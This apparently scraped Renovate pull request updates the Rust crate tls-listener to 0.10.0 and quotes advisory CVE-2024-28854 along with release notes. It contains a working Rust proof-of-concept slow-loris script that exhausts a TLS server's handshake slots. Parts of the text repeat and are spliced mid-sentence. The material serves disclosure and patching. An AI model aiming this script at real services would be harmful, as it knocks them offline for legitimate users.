use std::{net::ToSocketAddrs, time::Duration};
use tokio::{io::AsyncReadExt, net::TcpStream, task::JoinSet};
#[tokio::main]
async fn main() {
const N: usize = 1024;
const T: Duration = Duration::from_secs(10);
let url = "127.0.0.1:3000";
let sockets: Vec<_> = url
.to_socket_addrs()
.unwrap()
.inspect(|s| println!("{s:?}"))
.collect();
let mut js = JoinSet::new();
let mut int = tokio::time::interval(T / (N as u32) / (sockets.len() as u32));
int.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Burst);
for _ in 0..10000 {
for &socket in &sockets {
int.tick().await;
js.spawn(async move {
let mut stream = TcpStream::connect(socket).await.unwrap();
let _ = tokio::time::timeout(T, stream.read_to_end(&mut Vec::new())).await;
});
}
}
while js.join_next().await.is_some() {}
}
Impact
This is an instance of a slow-loris attack. This impacts any publically accessible service using the default configuration of tls-listener
Mitigation
Previous versions can mitigate this by passing a large value, such as usize::MAX as the parameter to Builder::max_handshakes.
Release Notes
tmccombs/tls-listener (tls-listener)
### [`v0.10.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#0100---2024-03-15)
[Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.9.1...v0.10.0)
##### Security Advisory
Versions prior to this using the default configuration are vulnerable to a Slowloris attack.
This version mitigates the vulnerability.
Previous versions can mitigate the vulnerability by increasing the value passed to `Builder::max_handshakes` to a large
number (such as `usize::MAX`). Decreasing the `handshake_timeout` can also help, although it is still strongly recommended
to increase the `max_handshakes` more than the current default.
##### Changes
- \[**breaking**] Change `poll_accept` not to have a limit on the number of pending handshakes in the queue,
so that connections that are not making progress towards completing the handshake will not block other
connections from being accepted. This replaces `Builder::max_handshakes` with `Builder::accept_batch_size`.
### [`v0.9.1`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#091---2023-12-23)
[Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.9.0...v0.9.1)
##### Miscellaneous Tasks
- Update tokio-rustls
### [`v0.9.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#090---2023-12-05)
[Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.8.0...v0.9.0)
##### Features
- \[**breaking**] Remove until & remove option from accept
- BREAKING CHANGE: remove `until` from AsyncAccept trait. Use
`StreamExt.take_until` on the TlsListener instead.
- BREAKING CHANGE: `accept` fn on AsyncAccept trait no longer returns an
Option
- BREAKING CHANGE: `accept` fn on TlsListener no longer returns an Option
##### Upgrade
- \[**breaking**] Update to hyper 1.0
- BREAKING CHANGE: Removed hyper-h1 and hyper-h2 features
### [`v0.8.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#080---2023-10-19)
[Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.7.0...v0.8.0)
This is a backwards incompatible release. The main change is that accepting a new connection now returns a tuple of the new connection, and the peer
address. The `AsyncAccept` trait was also changed similarly. The `Error` enum was also changed to provide more details about the error. And if
the handshake times out, it now returns an error instead of silently waiting for the next connection.
##### Features
- \[**breaking**] Add a new error type for handshake timeouts
- BREAKING CHANGE: Adds a new variant to the Error Enum
- BREAKING CHANGE: The Error enum is now non_exhaustive
- BREAKING CHANGE: Now returns an error if a handshake times out
- \[**breaking**] Yield remote address upon accepting a connection, and include it in errors.
- BREAKING CHANGE: The enum variant `Error::ListenerError` is now struct-like instead of tuple-like, and is `non_exhaustive` like the enum itself.
- BREAKING CHANGE: `Error` now has three type parameters, not two.
- BREAKING CHANGE: `TlsListener::accept` and `::next` yields a tuple of (connection, remote address), not just the connection.
- BREAKING CHANGE: `AsyncAccept` now has an associated type `Address`, which `poll_accept` must now return along with the accepted connection.
- \[**breaking**] More changes for including peer address in response
- BREAKING CHANGE: AsyncAccept::Error must implement std::error::Error
- BREAKING CHANGE: TlsAcceptError is now a struct form variant.
### [`v0.7.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#070---2023-03-31)
[Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.6.0...v0.7.0)
##### Changed
- Increase tokio-rustls version to 0.24.0
### [`v0.6.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#060---2022-12-30)
[Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.5.1...v0.6.0)
##### Added
- Added additional tests and examples
- Re-export tls engine crates as public modules.
##### Changed
- Increased default handshake timeout to 10 seconds (technically a breaking change)
Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
â™» Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
[ ] If you want to rebase/retry this PR, check this box
This PR contains the following updates:
0.5.1->0.10.0GitHub Vulnerability Alerts
CVE-2024-28854
Summary
With the default configuration of tls-listener, a malicious user can open 6.4
TcpStreams a second, sending 0 bytes, and can trigger a DoS.Details
The default configuration options make any public service using
TlsListener::new()vulnerable to a slow-loris DoS attack.PoC
Running the HTTP TLS server example: https://github.com/tmccombs/tls-listener/blob/6c57dea2d9beb1577ae4d80f6eaf03aad4ef3857/examples/http.rs, then running the following script will prevent new connections to the server.
Impact
This is an instance of a slow-loris attack. This impacts any publically accessible service using the default configuration of
tls-listenerMitigation
Previous versions can mitigate this by passing a large value, such as
usize::MAXas the parameter toBuilder::max_handshakes.Release Notes
tmccombs/tls-listener (tls-listener)
### [`v0.10.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#0100---2024-03-15) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.9.1...v0.10.0) ##### Security Advisory Versions prior to this using the default configuration are vulnerable to a Slowloris attack. This version mitigates the vulnerability. Previous versions can mitigate the vulnerability by increasing the value passed to `Builder::max_handshakes` to a large number (such as `usize::MAX`). Decreasing the `handshake_timeout` can also help, although it is still strongly recommended to increase the `max_handshakes` more than the current default. ##### Changes - \[**breaking**] Change `poll_accept` not to have a limit on the number of pending handshakes in the queue, so that connections that are not making progress towards completing the handshake will not block other connections from being accepted. This replaces `Builder::max_handshakes` with `Builder::accept_batch_size`. ### [`v0.9.1`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#091---2023-12-23) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.9.0...v0.9.1) ##### Miscellaneous Tasks - Update tokio-rustls ### [`v0.9.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#090---2023-12-05) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.8.0...v0.9.0) ##### Features - \[**breaking**] Remove until & remove option from accept - BREAKING CHANGE: remove `until` from AsyncAccept trait. Use `StreamExt.take_until` on the TlsListener instead. - BREAKING CHANGE: `accept` fn on AsyncAccept trait no longer returns an Option - BREAKING CHANGE: `accept` fn on TlsListener no longer returns an Option ##### Upgrade - \[**breaking**] Update to hyper 1.0 - BREAKING CHANGE: Removed hyper-h1 and hyper-h2 features ### [`v0.8.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#080---2023-10-19) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.7.0...v0.8.0) This is a backwards incompatible release. The main change is that accepting a new connection now returns a tuple of the new connection, and the peer address. The `AsyncAccept` trait was also changed similarly. The `Error` enum was also changed to provide more details about the error. And if the handshake times out, it now returns an error instead of silently waiting for the next connection. ##### Features - \[**breaking**] Add a new error type for handshake timeouts - BREAKING CHANGE: Adds a new variant to the Error Enum - BREAKING CHANGE: The Error enum is now non_exhaustive - BREAKING CHANGE: Now returns an error if a handshake times out - \[**breaking**] Yield remote address upon accepting a connection, and include it in errors. - BREAKING CHANGE: The enum variant `Error::ListenerError` is now struct-like instead of tuple-like, and is `non_exhaustive` like the enum itself. - BREAKING CHANGE: `Error` now has three type parameters, not two. - BREAKING CHANGE: `TlsListener::accept` and `Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
â™» Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.